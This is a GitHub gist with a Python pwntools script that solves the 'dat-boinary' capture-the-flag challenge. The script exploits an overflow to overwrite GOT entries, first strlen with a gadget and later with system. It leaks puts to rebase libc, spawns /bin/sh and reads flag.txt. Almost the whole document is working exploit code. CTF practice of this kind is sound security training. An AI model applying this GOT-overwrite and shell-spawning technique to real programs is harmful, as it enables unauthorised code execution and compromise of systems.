Created
September 4, 2016 22:49
-
-
Save wumb0/c21bdd450c6a83c6425e54f053037fcf to your computer and use it in GitHub Desktop.
dat-boinary solver
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from time import sleep | |
| e = ELF('./dat-boinary') | |
| libc = ELF(args.get('LIBC', './libc.so.6')) | |
| if args.get('REMOTE'): | |
| r = remote("problems.ctfx.io", 1337) | |
| else: | |
| r = process(e.path) | |
| strlen_replace = 0x08048567 | |
| ''' | |
| 0x08048567 91 xchg eax, ecx | |
| 0x08048568 0408 add al, 8 | |
| 0x0804856a 01c9 add ecx, ecx | |
| 0x0804856c f3c3 ret | |
| ''' | |
| if not args.get("REMOTE"): | |
| gdb.attach(r, "b * 0x0804889d") | |
| sleep(3) | |
| # max out the id buffer so we can overwrite past it later | |
| r.sendline(cyclic(8)) | |
| r.recv(1024) | |
| log.info("buffer maxed out") | |
| # set id buffer+8 to 0x69696969 to clear nulls so we can overwrite meme content addr | |
| r.sendline("5") | |
| r.recv(1024) | |
| log.info("called secret meme") | |
| # set meme content addr to strlen | |
| r.sendline("1") | |
| r.sendline(cyclic(0xc) + p32(e.sym['got.strlen']) + cyclic(10)) | |
| r.recv(1024) | |
| log.info("meme content should be addr of strlen") | |
| # set dankness back to a reasonable # so that we can write content to the meme | |
| r.sendline("2") | |
| r.sendline("5") | |
| r.recv(1024) | |
| log.info("set dankness to 5") | |
| # overwrite strlen with our gadget that ignores nulls | |
| r.sendline("3") | |
| r.sendline(p32(strlen_replace)) | |
| r.recv(1024) | |
| log.info("strlen replaced") | |
| # set meme content addr to puts | |
| r.sendline("1") | |
| r.sendline(cyclic(0xc) + p32(e.sym['got.puts']) + cyclic(10)) | |
| r.recv(1024) | |
| log.info("meme is now the address of puts") | |
| # leak the address of puts... I guess I could have just done strlen. Oh well | |
| r.sendline("4") | |
| r.recvuntil("c0nT3nT:") | |
| r.recv(1) #tab | |
| leaked_puts = u32(r.recv(4)) | |
| # rebase libc on leaked puts addr | |
| libc.address = leaked_puts - libc.symbols["puts"] | |
| r.recv(1024) | |
| log.success("leaked puts: " + hex(leaked_puts) + ", system: " + hex(libc.symbols['system'])) | |
| # read in /bin/sh to id and also set the meme content addr to strlen | |
| r.sendline("1") | |
| r.sendline("/bin/sh\x00" + cyclic(0xc-8) + p32(e.sym['got.strlen']) + cyclic(20)) | |
| r.recv(1024) | |
| log.info("set meme to strlen") | |
| # to set content (overwrite strlen with system) set the dankness back to 11 :) | |
| r.sendline("2") | |
| r.sendline("5") | |
| r.recv(1024) | |
| log.info("set dankness to 5") | |
| # overwrite strlen with system | |
| r.sendline("3") | |
| r.sendline(p32(libc.symbols['system'])) | |
| r.recv(1024) | |
| log.info("set strlen to system") | |
| # call dat bad boiiii | |
| r.sendline("1") | |
| r.recvuntil("ur m3m3 id") | |
| # enjoy dat shell boi ;) | |
| r.sendline("id") | |
| log.info("trying shell") | |
| if "uid=" in r.recvrepeat(2): | |
| log.success("got shell") | |
| r.sendline("cat flag.txt") | |
| log.success("Flag: " + r.recv(1024)) | |
| else: | |
| log.error("failed to get shell") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment